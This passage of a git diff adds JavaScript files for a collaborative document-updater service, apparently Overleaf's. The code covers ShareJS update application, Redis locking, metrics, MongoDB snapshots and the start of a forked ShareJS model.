'transform-updates.count', + 0, + TRANSFORM_UPDATES_COUNT_BUCKETS, + { path: 'sharejs', status } + ) + return callback(null, []) + } + + // In redis, lrange values are inclusive. + if (end != null) { + end-- + } else { + end = -1 + } + + const [projectId, docId] = Array.from(Keys.splitProjectIdAndDocId(docKey)) + const timer = new Metrics.Timer( + 'transform-updates.timing', + 1, + { path: 'sharejs' }, + [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 20, 50, 100, 200, 500, 1000] + ) + RedisManager.getPreviousDocOps(docId, start, end, (err, ops) => { + let status + if (err) { + if (err instanceof Errors.OpRangeNotAvailableError) { + status = 'out-of-range' + } else { + status = 'error' + } + } else { + if (ops.length === 0) { + status = 'fetched-zero' + + // The sharejs processing is happening under a lock. + // In case there are no other ops available, something bypassed the lock (or we overran it). + logger.warn( + { + projectId, + docId, + start, + end, + timeSinceShareJsDBInit: + performance.now() - this.startTimeShareJsDB, + }, + 'found zero docOps while transforming update' + ) + } else { + status = 'fetched' + } + Metrics.histogram( + 'transform-updates.count', + ops.length, + TRANSFORM_UPDATES_COUNT_BUCKETS, + { path: 'sharejs', status } + ) + } + + timer.done({ status }) + Metrics.inc('transform-updates', 1, { status, path: 'sharejs' }) + callback(err, ops) + }) + } + + _writeOp(docKey, opData, callback) { + if (this.appliedOps[docKey] == null) { + this.appliedOps[docKey] = [] + } + this.appliedOps[docKey].push(opData) + return callback() + } + + getSnapshot(docKey, callback) { + if ( + docKey !== Keys.combineProjectIdAndDocId(this.project_id, this.doc_id) + ) { + return callback( + new Errors.NotFoundError( + `unexpected doc_key ${docKey}, expected ${Keys.combineProjectIdAndDocId( + this.project_id, + this.doc_id + )}` + ) + ) + } else { + return callback(null, { + snapshot: this.lines.join('\n'), + v: parseInt(this.version, 10), + type: 'text', + }) + } + } + + // To be able to remove a doc from the ShareJS memory + // we need to called Model::delete, which calls this + // method on the database. However, we will handle removing + // it from Redis ourselves + delete(docName, dbMeta, callback) { + return callback() + } +} diff --git a/services/document-updater/app/js/ShareJsUpdateManager.js b/services/document-updater/app/js/ShareJsUpdateManager.js new file mode 100644 index 0000000..933ded1 --- /dev/null +++ b/services/document-updater/app/js/ShareJsUpdateManager.js @@ -0,0 +1,158 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const ShareJsModel = require('./sharejs/server/model') +const ShareJsDB = require('./ShareJsDB') +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') +const { promisifyAll } = require('@overleaf/promise-utils') +const Keys = require('./UpdateKeys') +const { EventEmitter } = require('node:events') +const util = require('node:util') +const RealTimeRedisManager = require('./RealTimeRedisManager') +const crypto = require('node:crypto') +const metrics = require('./Metrics') +const Errors = require('./Errors') + +ShareJsModel.prototype = {} +util.inherits(ShareJsModel, EventEmitter) + +const MAX_AGE_OF_OP = 80 + +const ShareJsUpdateManager = { + getNewShareJsModel(projectId, docId, lines, version) { + const db = new ShareJsDB(projectId, docId, lines, version) + const model = new ShareJsModel(db, { + maxDocLength: Settings.max_doc_length, + maximumAge: MAX_AGE_OF_OP, + }) + model.db = db + return model + }, + + applyUpdate(projectId, docId, update, lines, version, callback) { + if (callback == null) { + callback = function () {} + } + logger.debug({ projectId, docId, update }, 'applying sharejs updates') + const jobs = [] + // record the update version before it is modified + const incomingUpdateVersion = update.v + // We could use a global model for all docs, but we're hitting issues with the + // internal state of ShareJS not being accessible for clearing caches, and + // getting stuck due to queued callbacks (line 260 of sharejs/server/model.coffee) + // This adds a small but hopefully acceptable overhead (~12ms per 1000 updates on + // my 2009 MBP). + const model = this.getNewShareJsModel(projectId, docId, lines, version) + this._listenForOps(model) + const docKey = Keys.combineProjectIdAndDocId(projectId, docId) + return model.applyOp(docKey, update, function (error) { + if (error != null) { + if (error === 'Op already submitted') { + metrics.inc('sharejs.already-submitted') + logger.debug( + { projectId, docId, update }, + 'op has already been submitted' + ) + update.dup = true + ShareJsUpdateManager._sendOp(projectId, docId, update) + } else if (/^Delete component/.test(error)) { + metrics.inc('sharejs.delete-mismatch') + logger.debug( + { projectId, docId, update, shareJsErr: error }, + 'sharejs delete does not match' + ) + error = new Errors.DeleteMismatchError( + 'Delete component does not match' + ) + return callback(error) + } else { + metrics.inc('sharejs.other-error') + return callback(error) + } + } + logger.debug({ projectId, docId, error }, 'applied update') + return model.getSnapshot(docKey, (error, data) => { + if (error != null) { + return callback(error) + } + const docSizeAfter = data.snapshot.length + if (docSizeAfter > Settings.max_doc_length) { + const docSizeBefore = lines.join('\n').length + const err = new Error( + 'blocking persistence of ShareJs update: doc size exceeds limits' + ) + logger.error( + { projectId, docId, err, docSizeBefore, docSizeAfter }, + err.message + ) + metrics.inc('sharejs.other-error') + const publicError = 'Update takes doc over max doc size' + return callback(publicError) + } + // only check hash when present and no other updates have been applied + if (update.hash != null && incomingUpdateVersion === version) { + const ourHash = ShareJsUpdateManager._computeHash(data.snapshot) + if (ourHash !== update.hash) { + metrics.inc('sharejs.hash-fail') + return callback(new Error('Invalid hash')) + } else { + metrics.inc('sharejs.hash-pass', 0.001) + } + } + const docLines = data.snapshot.split(/\r\n|\n|\r/) + return callback( + null, + docLines, + data.v, + model.db.appliedOps[docKey] || [] + ) + }) + }) + }, + + _listenForOps(model) { + return model.on('applyOp', function (docKey, opData) { + const [projectId, docId] = Array.from(Keys.splitProjectIdAndDocId(docKey)) + return ShareJsUpdateManager._sendOp(projectId, docId, opData) + }) + }, + + _sendOp(projectId, docId, op) { + RealTimeRedisManager.sendData({ + project_id: projectId, + doc_id: docId, + op, + }) + RealTimeRedisManager.sendCanaryAppliedOp({ + projectId, + docId, + op, + }) + }, + + _computeHash(content) { + return crypto + .createHash('sha1') + .update('blob ' + content.length + '\x00') + .update(content, 'utf8') + .digest('hex') + }, +} + +module.exports = ShareJsUpdateManager +module.exports.promises = promisifyAll(ShareJsUpdateManager, { + without: ['getNewShareJsModel', '_listenForOps', '_sendOp', '_computeHash'], + multiResult: { + applyUpdate: ['updatedDocLines', 'version', 'appliedOps'], + }, +}) diff --git a/services/document-updater/app/js/SnapshotManager.js b/services/document-updater/app/js/SnapshotManager.js new file mode 100644 index 0000000..c207e73 --- /dev/null +++ b/services/document-updater/app/js/SnapshotManager.js @@ -0,0 +1,83 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { promisifyAll } = require('@overleaf/promise-utils') +const { db, ObjectId } = require('./mongodb') + +const SnapshotManager = { + recordSnapshot(projectId, docId, version, pathname, lines, ranges, callback) { + try { + projectId = new ObjectId(projectId) + docId = new ObjectId(docId) + } catch (error) { + return callback(error) + } + db.docSnapshots.insertOne( + { + project_id: projectId, + doc_id: docId, + version, + lines, + pathname, + ranges: SnapshotManager.jsonRangesToMongo(ranges), + ts: new Date(), + }, + callback + ) + }, + // Suggested indexes: + // db.docSnapshots.createIndex({project_id:1, doc_id:1}) + // db.docSnapshots.createIndex({ts:1},{expiresAfterSeconds: 30*24*3600)) # expires after 30 days + + jsonRangesToMongo(ranges) { + if (ranges == null) { + return null + } + + const updateMetadata = function (metadata) { + if ((metadata != null ? metadata.ts : undefined) != null) { + metadata.ts = new Date(metadata.ts) + } + if ((metadata != null ? metadata.user_id : undefined) != null) { + return (metadata.user_id = SnapshotManager._safeObjectId( + metadata.user_id + )) + } + } + + for (const change of Array.from(ranges.changes || [])) { + change.id = SnapshotManager._safeObjectId(change.id) + updateMetadata(change.metadata) + } + for (const comment of Array.from(ranges.comments || [])) { + comment.id = SnapshotManager._safeObjectId(comment.id) + if ((comment.op != null ? comment.op.t : undefined) != null) { + comment.op.t = SnapshotManager._safeObjectId(comment.op.t) + } + updateMetadata(comment.metadata) + } + return ranges + }, + + _safeObjectId(data) { + try { + return new ObjectId(data) + } catch (error) { + return data + } + }, +} + +module.exports = SnapshotManager +module.exports.promises = promisifyAll(SnapshotManager, { + without: ['jsonRangesToMongo', '_safeObjectId'], +}) diff --git a/services/document-updater/app/js/UpdateKeys.js b/services/document-updater/app/js/UpdateKeys.js new file mode 100644 index 0000000..3c03dd1 --- /dev/null +++ b/services/document-updater/app/js/UpdateKeys.js @@ -0,0 +1,10 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +module.exports = { + combineProjectIdAndDocId(projectId, docId) { + return `${projectId}:${docId}` + }, + splitProjectIdAndDocId(projectAndDocId) { + return projectAndDocId.split(':') + }, +} diff --git a/services/document-updater/app/js/UpdateManager.js b/services/document-updater/app/js/UpdateManager.js new file mode 100644 index 0000000..1f58a75 --- /dev/null +++ b/services/document-updater/app/js/UpdateManager.js @@ -0,0 +1,378 @@ +// @ts-check + +const { callbackifyAll } = require('@overleaf/promise-utils') +const LockManager = require('./LockManager') +const RedisManager = require('./RedisManager') +const ProjectHistoryRedisManager = require('./ProjectHistoryRedisManager') +const RealTimeRedisManager = require('./RealTimeRedisManager') +const ShareJsUpdateManager = require('./ShareJsUpdateManager') +const HistoryManager = require('./HistoryManager') +const logger = require('@overleaf/logger') +const Metrics = require('./Metrics') +const Errors = require('./Errors') +const DocumentManager = require('./DocumentManager') +const RangesManager = require('./RangesManager') +const SnapshotManager = require('./SnapshotManager') +const Profiler = require('./Profiler') +const { isInsert, isDelete, getDocLength, computeDocHash } = require('./Utils') + +/** + * @import { DeleteOp, InsertOp, Op, Ranges, Update, HistoryUpdate } from "./types" + */ + +const UpdateManager = { + async processOutstandingUpdates(projectId, docId) { + const timer = new Metrics.Timer('updateManager.processOutstandingUpdates') + try { + await UpdateManager.fetchAndApplyUpdates(projectId, docId) + timer.done({ status: 'success' }) + } catch (err) { + timer.done({ status: 'error' }) + throw err + } + }, + + async processOutstandingUpdatesWithLock(projectId, docId) { + const profile = new Profiler('processOutstandingUpdatesWithLock', { + project_id: projectId, + doc_id: docId, + }) + + const lockValue = await LockManager.promises.tryLock(docId) + if (lockValue == null) { + return + } + profile.log('tryLock') + + try { + await UpdateManager.processOutstandingUpdates(projectId, docId) + profile.log('processOutstandingUpdates') + } finally { + await LockManager.promises.releaseLock(docId, lockValue) + profile.log('releaseLock').end() + } + + await UpdateManager.continueProcessingUpdatesWithLock(projectId, docId) + }, + + async continueProcessingUpdatesWithLock(projectId, docId) { + const length = await RealTimeRedisManager.promises.getUpdatesLength(docId) + if (length > 0) { + await UpdateManager.processOutstandingUpdatesWithLock(projectId, docId) + } + }, + + async fetchAndApplyUpdates(projectId, docId) { + const profile = new Profiler('fetchAndApplyUpdates', { + project_id: projectId, + doc_id: docId, + }) + + const updates = + await RealTimeRedisManager.promises.getPendingUpdatesForDoc(docId) + logger.debug( + { projectId, docId, count: updates.length }, + 'processing updates' + ) + if (updates.length === 0) { + return + } + profile.log('getPendingUpdatesForDoc') + + for (const update of updates) { + await UpdateManager.applyUpdate(projectId, docId, update) + profile.log('applyUpdate') + } + profile.log('async done').end() + }, + + /** + * Apply an update to the given document + * + * @param {string} projectId + * @param {string} docId + * @param {Update} update + */ + async applyUpdate(projectId, docId, update) { + const profile = new Profiler('applyUpdate', { + project_id: projectId, + doc_id: docId, + }) + + UpdateManager._sanitizeUpdate(update) + profile.log('sanitizeUpdate', { sync: true }) + + try { + let { + lines, + version, + ranges, + pathname, + projectHistoryId, + historyRangesSupport, + } = await DocumentManager.promises.getDoc(projectId, docId) + profile.log('getDoc') + + if (lines == null || version == null) { + throw new Errors.NotFoundError(`document not found: ${docId}`) + } + + const previousVersion = version + const incomingUpdateVersion = update.v + let updatedDocLines, appliedOps + ;({ updatedDocLines, version, appliedOps } = + await ShareJsUpdateManager.promises.applyUpdate( + projectId, + docId, + update, + lines, + version + )) + profile.log('sharejs.applyUpdate', { + // only synchronous when the update applies directly to the + // doc version, otherwise getPreviousDocOps is called. + sync: incomingUpdateVersion === previousVersion, + }) + + const { newRanges, rangesWereCollapsed, historyUpdates } = + RangesManager.applyUpdate( + projectId, + docId, + ranges, + appliedOps, + updatedDocLines, + { historyRangesSupport } + ) + profile.log('RangesManager.applyUpdate', { sync: true }) + + await RedisManager.promises.updateDocument( + projectId, + docId, + updatedDocLines, + version, + appliedOps, + newRanges, + update.meta + ) + profile.log('RedisManager.updateDocument') + + UpdateManager._adjustHistoryUpdatesMetadata( + historyUpdates, + pathname, + projectHistoryId, + lines, + ranges, + updatedDocLines, + historyRangesSupport + ) + + if (historyUpdates.length > 0) { + Metrics.inc('history-queue', 1, { status: 'project-history' }) + try { + const projectOpsLength = + await ProjectHistoryRedisManager.promises.queueOps( + projectId, + ...historyUpdates.map(op => JSON.stringify(op)) + ) + HistoryManager.recordAndFlushHistoryOps( + projectId, + historyUpdates, + projectOpsLength + ) + profile.log('recordAndFlushHistoryOps') + } catch (err) { + // The full project history can re-sync a project in case + // updates went missing. + // Just record the error here and acknowledge the write-op. + Metrics.inc('history-queue-error') + } + } + + if (rangesWereCollapsed) { + Metrics.inc('doc-snapshot') + logger.debug( + { + projectId, + docId, + previousVersion, + lines, + ranges, + update, + }, + 'update collapsed some ranges, snapshotting previous content' + ) + + // Do this last, since it's a mongo call, and so potentially longest running + // If it overruns the lock, it's ok, since all of our redis work is done + await SnapshotManager.promises.recordSnapshot( + projectId, + docId, + previousVersion, + pathname, + lines, + ranges + ) + } + } catch (error) { + RealTimeRedisManager.sendData({ + project_id: projectId, + doc_id: docId, + error: error instanceof Error ? error.message : error, + }) + profile.log('sendData') + throw error + } finally { + profile.end() + } + }, + + async lockUpdatesAndDo(method, projectId, docId, ...args) { + const profile = new Profiler('lockUpdatesAndDo', { + project_id: projectId, + doc_id: docId, + }) + + const lockValue = await LockManager.promises.getLock(docId) + profile.log('getLock') + + let result + try { + await UpdateManager.processOutstandingUpdates(projectId, docId) + profile.log('processOutstandingUpdates') + + result = await method(projectId, docId, ...args) + profile.log('method') + } finally { + await LockManager.promises.releaseLock(docId, lockValue) + profile.log('releaseLock').end() + } + + // We held the lock for a while so updates might have queued up + UpdateManager.continueProcessingUpdatesWithLock(projectId, docId).catch( + err => { + // The processing may fail for invalid user updates. + // This can be very noisy, put them on level DEBUG + // and record a metric. + Metrics.inc('background-processing-updates-error') + logger.debug( + { err, projectId, docId }, + 'error processing updates in background' + ) + } + ) + + return result + }, + + _sanitizeUpdate(update) { + // In Javascript, characters are 16-bits wide. It does not understand surrogates as characters. + // + // From Wikipedia (http://en.wikipedia.org/wiki/Plane_(Unicode)#Basic_Multilingual_Plane): + // "The High Surrogates (U+D800–U+DBFF) and Low Surrogate (U+DC00–U+DFFF) codes are reserved + // for encoding non-BMP characters in UTF-16 by using a pair of 16-bit codes: one High Surrogate + // and one Low Surrogate. A single surrogate code point will never be assigned a character."" + // + // The main offender seems to be \uD835 as a stand alone character, which would be the first + // 16-bit character of a blackboard bold character (http://www.fileformat.info/info/unicode/char/1d400/index.htm). + // Something must be going on client side that is screwing up the encoding and splitting the + // two 16-bit characters so that \uD835 is standalone. + for (const op of update.op || []) { + if (op.i != null) { + // Replace high and low surrogate characters with 'replacement character' (\uFFFD) + op.i = op.i.replace(/[\uD800-\uDFFF]/g, '\uFFFD') + } + } + return update + }, + + /** + * Add metadata that will be useful to project history + * + * @param {HistoryUpdate[]} updates + * @param {string} pathname + * @param {string} projectHistoryId + * @param {string[]} lines - document lines before updates were applied + * @param {Ranges} ranges - ranges before updates were applied + * @param {string[]} newLines - document lines after updates were applied + * @param {boolean} historyRangesSupport + */ + _adjustHistoryUpdatesMetadata( + updates, + pathname, + projectHistoryId, + lines, + ranges, + newLines, + historyRangesSupport + ) { + let docLength = getDocLength(lines) + let historyDocLength = docLength + for (const change of ranges.changes ?? []) { + if ('d' in change.op) { + historyDocLength += change.op.d.length + } + } + + for (const update of updates) { + update.projectHistoryId = projectHistoryId + if (!update.meta) { + update.meta = {} + } + update.meta.pathname = pathname + update.meta.doc_length = docLength + if (historyRangesSupport && historyDocLength !== docLength) { + update.meta.history_doc_length = historyDocLength + } + + // Each update may contain multiple ops, i.e. + // [{ + // ops: [{i: "foo", p: 4}, {d: "bar", p:8}] + // }, { + // ops: [{d: "baz", p: 40}, {i: "qux", p:8}] + // }] + // We want to include the doc_length at the start of each update, + // before it's ops are applied. However, we need to track any + // changes to it for the next update. + for (const op of update.op) { + if (isInsert(op)) { + docLength += op.i.length + if (!op.trackedDeleteRejection) { + // Tracked delete rejections end up retaining characters rather + // than inserting + historyDocLength += op.i.length + } + } + if (isDelete(op)) { + docLength -= op.d.length + if (update.meta.tc) { + // This is a tracked delete. It will be translated into a retain in + // history, except any enclosed tracked inserts, which will be + // translated into regular deletes. + for (const change of op.trackedChanges ?? []) { + if (change.type === 'insert') { + historyDocLength -= change.length + } + } + } else { + // This is a regular delete. It will be translated to a delete in + // history. + historyDocLength -= op.d.length + } + } + } + + if (!historyRangesSupport) { + // Prevent project-history from processing tracked changes + delete update.meta.tc + } + } + + if (historyRangesSupport && updates.length > 0) { + const lastUpdate = updates[updates.length - 1] + lastUpdate.meta ??= {} + lastUpdate.meta.doc_hash = computeDocHash(newLines) + } + }, +} + +module.exports = { ...callbackifyAll(UpdateManager), promises: UpdateManager } diff --git a/services/document-updater/app/js/Utils.js b/services/document-updater/app/js/Utils.js new file mode 100644 index 0000000..a632cf3 --- /dev/null +++ b/services/document-updater/app/js/Utils.js @@ -0,0 +1,129 @@ +// @ts-check +const { createHash } = require('node:crypto') +const _ = require('lodash') + +/** + * @import { CommentOp, DeleteOp, InsertOp, Op, TrackedChange } from './types' + */ + +/** + * Returns true if the op is an insert + * + * @param {Op} op + * @returns {op is InsertOp} + */ +function isInsert(op) { + return 'i' in op && op.i != null +} + +/** + * Returns true if the op is an insert + * + * @param {Op} op + * @returns {op is DeleteOp} + */ +function isDelete(op) { + return 'd' in op && op.d != null +} + +/** + * Returns true if the op is a comment + * + * @param {Op} op + * @returns {op is CommentOp} + */ +function isComment(op) { + return 'c' in op && op.c != null +} + +/** + * Get the length of a document from its lines + * + * @param {string[]} lines + * @returns {number} + */ +function getDocLength(lines) { + let docLength = _.reduce(lines, (chars, line) => chars + line.length, 0) + // Add newline characters. Lines are joined by newlines, but the last line + // doesn't include a newline. We must make a special case for an empty list + // so that it doesn't report a doc length of -1. + docLength += Math.max(lines.length - 1, 0) + + return docLength +} + +/** + * Adds given tracked deletes to the given content. + * + * The history system includes tracked deletes in the document content. + * + * @param {string} content + * @param {TrackedChange[]} trackedChanges + * @return {string} content for the history service + */ +function addTrackedDeletesToContent(content, trackedChanges) { + let cursor = 0 + let result = '' + for (const change of trackedChanges) { + if (isDelete(change.op)) { + // Add the content before the tracked delete + result += content.slice(cursor, change.op.p) + cursor = change.op.p + // Add the content of the tracked delete + result += change.op.d + } + } + + // Add the content after all tracked deletes + result += content.slice(cursor) + + return result +} + +/** + * Compute the content hash for a doc + * + * This hash is sent to the history to validate updates. + * + * @param {string[]} lines + * @return {string} the doc hash + */ +function computeDocHash(lines) { + const hash = createHash('sha1') + if (lines.length > 0) { + for (const line of lines.slice(0, lines.length - 1)) { + hash.update(line) + hash.update('\n') + } + // The last line doesn't end with a newline + hash.update(lines[lines.length - 1]) + } + return hash.digest('hex') +} + +/** + * checks if the given originOrSource should be treated as a source or origin + * TODO: remove this hack and remove all "source" references + */ +function extractOriginOrSource(originOrSource) { + let source = null + let origin = null + + if (typeof originOrSource === 'string') { + source = originOrSource + } else if (originOrSource && typeof originOrSource === 'object') { + origin = originOrSource + } + + return { source, origin } +} + +module.exports = { + isInsert, + isDelete, + isComment, + addTrackedDeletesToContent, + getDocLength, + computeDocHash, + extractOriginOrSource, +} diff --git a/services/document-updater/app/js/mongodb.js b/services/document-updater/app/js/mongodb.js new file mode 100644 index 0000000..6e38993 --- /dev/null +++ b/services/document-updater/app/js/mongodb.js @@ -0,0 +1,28 @@ +const Metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const { MongoClient, ObjectId } = require('mongodb-legacy') + +const mongoClient = new MongoClient(Settings.mongo.url, Settings.mongo.options) +const mongoDb = mongoClient.db() + +const db = { + docs: mongoDb.collection('docs'), + docSnapshots: mongoDb.collection('docSnapshots'), + projects: mongoDb.collection('projects'), +} + +async function healthCheck() { + const res = await mongoDb.command({ ping: 1 }) + if (!res.ok) { + throw new Error('failed mongo ping') + } +} + +Metrics.mongodb.monitor(mongoClient) + +module.exports = { + db, + ObjectId, + mongoClient, + healthCheck: require('node:util').callbackify(healthCheck), +} diff --git a/services/document-updater/app/js/sharejs/LICENSE b/services/document-updater/app/js/sharejs/LICENSE new file mode 100644 index 0000000..3e6b73e --- /dev/null +++ b/services/document-updater/app/js/sharejs/LICENSE @@ -0,0 +1,22 @@ +Licensed under the standard MIT license: + +Copyright 2011 Joseph Gentle. +Copyright 2012-2024 Overleaf. + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. diff --git a/services/document-updater/app/js/sharejs/README.md b/services/document-updater/app/js/sharejs/README.md new file mode 100644 index 0000000..f5919dd --- /dev/null +++ b/services/document-updater/app/js/sharejs/README.md @@ -0,0 +1,6 @@ +This folder contains a modified version of the ShareJS source code, forked from [v0.5.0](https://github.com/josephg/ShareJS/tree/v0.5.0/). + +The original CoffeeScript code has been decaffeinated to JavaScript, and further modified. Some folders have been removed. See https://github.com/josephg/ShareJS/blob/v0.5.0/src/types/README.md for the original README. + +The original code, and the current modified code in this directory, are published under the MIT license. + diff --git a/services/document-updater/app/js/sharejs/server/model.js b/services/document-updater/app/js/sharejs/server/model.js new file mode 100644 index 0000000..a646b22 --- /dev/null +++ b/services/document-updater/app/js/sharejs/server/model.js @@ -0,0 +1,895 @@ +/* eslint-disable + no-console, + no-return-assign, + n/no-callback-literal, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS103: Rewrite code to no longer use __guard__ + * DS104: Avoid inline assignments + * DS204: Change includes calls to have a more natural evaluation order + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// The model of all the ops. Responsible for applying & transforming remote deltas +// and managing the storage layer. +// +// Actual storage is handled by the database wrappers in db/*, wrapped by DocCache + +let Model +const { EventEmitter } = require('node:events') + +const queue = require('./syncqueue') +const types = require('../types') + +const Profiler = require('../../Profiler') + +const isArray = o => Object.prototype.toString.call(o) === '[object Array]' + +// This constructor creates a new Model object. There will be one model object +// per server context. +// +// The model object is responsible for a lot of things: +// +// - It manages the interactions with the database +// - It maintains (in memory) a set of all active documents +// - It calls out to the OT functions when necessary +// +// The model is an event emitter. It emits the following events: +// +// create(docName, data): A document has been created with the specified name & data +module.exports = Model = function (db, options) { + // db can be null if the user doesn't want persistance. + + let getOps + if (!(this instanceof Model)) { + return new Model(db, options) + } + + const model = this + + if (options == null) { + options = {} + } + + // This is a cache of 'live' documents. + // + // The cache is a map from docName -> { + // ops:[{op, meta}] + // snapshot + // type + // v + // meta + // eventEmitter + // reapTimer + // committedVersion: v + // snapshotWriteLock: bool to make sure writeSnapshot isn't re-entrant + // dbMeta: database specific data + // opQueue: syncQueue for processing ops + // } + // + // The ops list contains the document's last options.numCachedOps ops. (Or all + // of them if we're using a memory store). + // + // Documents are stored in this set so long as the document has been accessed in + // the last few seconds (options.reapTime) OR at least one client has the document + // open. I don't know if I should keep open (but not being edited) documents live - + // maybe if a client has a document open but the document isn't being edited, I should + // flush it from the cache. + // + // In any case, the API to model is designed such that if we want to change that later + // it should be pretty easy to do so without any external-to-the-model code changes. + const docs = {} + + // This is a map from docName -> [callback]. It is used when a document hasn't been + // cached and multiple getSnapshot() / getVersion() requests come in. All requests + // are added to the callback list and called when db.getSnapshot() returns. + // + // callback(error, snapshot data) + const awaitingGetSnapshot = {} + + // The time that documents which no clients have open will stay in the cache. + // Should be > 0. + if (options.reapTime == null) { + options.reapTime = 3000 + } + + // The number of operations the cache holds before reusing the space + if (options.numCachedOps == null) { + options.numCachedOps = 10 + } + + // This option forces documents to be reaped, even when there's no database backend. + // This is useful when you don't care about persistance and don't want to gradually + // fill memory. + // + // You might want to set reapTime to a day or something. + if (options.forceReaping == null) { + options.forceReaping = false + } + + // Until I come up with a better strategy, we'll save a copy of the document snapshot + // to the database every ~20 submitted ops. + if (options.opsBeforeCommit == null) { + options.opsBeforeCommit = 20 + } + + // It takes some processing time to transform client ops. The server will punt ops back to the + // client to transform if they're too old. + if (options.maximumAge == null) { + options.maximumAge = 40 + } + + // **** Cache API methods + + // Its important that all ops are applied in order. This helper method creates the op submission queue + // for a single document. This contains the logic for transforming & applying ops. + const makeOpQueue = (docName, doc) => + queue(function (opData, callback) { + if (!(opData.v >= 0)) { + return callback('Version missing') + } + if (opData.v > doc.v) { + return callback('Op at future version') + } + + // Punt the transforming work back to the client if the op is too old. + if (opData.v + options.maximumAge < doc.v) { + return callback('Op too old') + } + + if (!opData.meta) { + opData.meta = {} + } + opData.meta.ts = Date.now() + + // We'll need to transform the op to the current version of the document. This + // calls the callback immediately if opVersion == doc.v. + return getOps(docName, opData.v, doc.v, function (error, ops) { + let snapshot + if (error) { + return callback(error) + } + + if (doc.v - opData.v !== ops.length) { + // This should never happen. It indicates that we didn't get all the ops we + // asked for. Its important that the submitted op is correctly transformed. + console.error( + `Could not get old ops in model for document ${docName}` + ) + console.error( + `Expected ops ${opData.v} to ${doc.v} and got ${ops.length} ops` + ) + return callback('Internal error') + } + + if (ops.length > 0) { + try { + const profile = new Profiler('model.transform') + // If there's enough ops, it might be worth spinning this out into a webworker thread. + for (const oldOp of Array.from(ops)) { + // Dup detection works by sending the id(s) the op has been submitted with previously. + // If the id matches, we reject it. The client can also detect the op has been submitted + // already if it sees its own previous id in the ops it sees when it does catchup. + if ( + oldOp.meta.source && + opData.dupIfSource && + Array.from(opData.dupIfSource).includes(oldOp.meta.source) + ) { + return callback('Op already submitted') + } + + opData.op = doc.type.transform(opData.op, oldOp.op, 'left') + opData.v++ + } + profile.log('transform', { sync: true }).end() + } catch (error1) { + error = error1 + return callback(error.message) + } + } + + try { + const profile = new Profiler('model.apply') + snapshot = doc.type.apply(doc.snapshot, opData.op) + profile.log('model.apply', { sync: true }).end() + } catch (error2) { + error = error2 + return callback(error.message) + } + + if ( + options.maxDocLength != null && + doc.snapshot.length > options.maxDocLength + ) { + return callback('Update takes doc over max doc size') + } + + // The op data should be at the current version, and the new document data should be at + // the next version. + // + // This should never happen in practice, but its a nice little check to make sure everything + // is hunky-dory. + if (opData.v !== doc.v) { + // This should never happen. + console.error( + 'Version mismatch detected in model. File a ticket - this is a bug.' + ) + console.error(`Expecting ${opData.v} == ${doc.v}`) + return callback('Internal error') + } + + // newDocData = {snapshot, type:type.name, v:opVersion + 1, meta:docData.meta} + const writeOp = + (db != null ? db.writeOp : undefined) || + ((docName, newOpData, callback) => callback()) + + return writeOp(docName, opData, function (error) { + if (error) { + // The user should probably know about this. + console.warn(`Error writing ops to database: ${error}`) + return callback(error) + } + + __guardMethod__(options.stats, 'writeOp', o => o.writeOp()) + + // This is needed when we emit the 'change' event, below. + const oldSnapshot = doc.snapshot + + // All the heavy lifting is now done. Finally, we'll update the cache with the new data + // and (maybe!) save a new document snapshot to the database. + + doc.v = opData.v + 1 + doc.snapshot = snapshot + + doc.ops.push(opData) + if (db && doc.ops.length > options.numCachedOps) { + doc.ops.shift() + } + + model.emit('applyOp', docName, opData, snapshot, oldSnapshot) + doc.eventEmitter.emit('op', opData, snapshot, oldSnapshot) + + // The callback is called with the version of the document at which the op was applied. + // This is the op.v after transformation, and its doc.v - 1. + callback(null, opData.v) + + // I need a decent strategy here for deciding whether or not to save the snapshot. + // + // The 'right' strategy looks something like "Store the snapshot whenever the snapshot + // is smaller than the accumulated op data". For now, I'll just store it every 20 + // ops or something. (Configurable with doc.committedVersion) + if ( + !doc.snapshotWriteLock && + doc.committedVersion + options.opsBeforeCommit <= doc.v + ) { + return tryWriteSnapshot(docName, function (error) { + if (error) { + return console.warn( + `Error writing snapshot ${error}. This is nonfatal` + ) + } + }) + } + }) + }) + }) + + // Add the data for the given docName to the cache. The named document shouldn't already + // exist in the doc set. + // + // Returns the new doc. + const add = function (docName, error, data, committedVersion, ops, dbMeta) { + let callback, doc + const 